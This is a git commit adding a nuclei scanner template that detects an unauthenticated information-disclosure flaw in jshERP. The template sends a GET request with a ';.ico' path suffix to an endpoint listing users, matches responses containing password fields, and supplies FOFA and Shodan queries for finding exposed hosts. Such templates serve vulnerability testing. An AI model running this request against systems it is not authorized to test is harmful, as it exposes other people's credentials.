Merge pull request #7546 from projectdiscovery/CNVD-2020-63964

Create CNVD-2020-63964.yaml
2023-06-26 10:51:40 +05:30 · 2023-06-26 10:51:40 +05:30 · ec5001968b
parent 6c7afee711 9c359507d2
commit ec5001968b
1 changed files with 38 additions and 0 deletions
--- a/http/cnvd/2020/CNVD-2020-63964.yaml
+++ b/http/cnvd/2020/CNVD-2020-63964.yaml
@ -0,0 +1,38 @@
+id: CNVD-2020-63964
+
+info:
+  name: jshERP - Information Disclosure
+  author: brucelsone
+  severity: high
+  description: |
+    jshERP that can reveal sensitive information including system credentials without credentials.
+  reference:
+    - https://cn-sec.com/archives/1798444.html
+  metadata:
+    max-request: 1
+    fofa-query: jshERP-boot
+    shodan-query: http.favicon.hash:-1298131932
+  tags: cnvd,cnvd2022,jsherp,disclosure
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/jshERP-boot/user/getAllList;.ico"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"username":'
+          - '"loginName":'
+          - '"password":'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200